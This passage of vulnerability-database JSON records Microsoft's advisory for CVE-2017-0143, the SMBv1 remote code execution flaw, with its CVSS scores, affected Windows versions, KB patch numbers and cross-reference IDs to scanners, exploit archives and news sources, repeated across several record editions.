"description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-17T04:46:25", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": 
"talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", 
"RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-16T12:44:29", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-16T12:44:29", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBMS16-110, 3187754", "KB3210721", "KB4012214", "KB3205401", "KB3210720", "KB4012212", "KB4012213", "KB4013198", "KB4012216", "KB3212646", "KB4012598", "KB4012215", "KB3177186", "KB4012606", "KB3213986", "KB3205409", "KB4013429", "KB4012217"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", 
"kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 
for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-17T04:46:25", "differentElements": ["msAffectedSoftware"], "edition": 50}, {"bulletin": {"id": 
"MS:CVE-2017-0143", "hash": "bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-17T10:52:46", "history": [], "viewCount": 9, 
"enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": 
["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-16T12:44:29", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-16T12:44:29", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205409", "KB4013198", "KB4012598", "KB4012606", "KB3210720", "KB3210721", "KB4012214", "KB3177186", "KB3212646", "KB4012216", "KB4012215", "KBMS16-110, 3187754", "KB3213986", "KB4012217", "KB3205401", "KB4013429", "KB4012212", "KB4012213"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", 
"msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": 
"KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": 
"KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", 
"kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-17T10:52:46", "differentElements": ["msAffectedSoftware"], "edition": 51}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-17T12:43:31", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": 
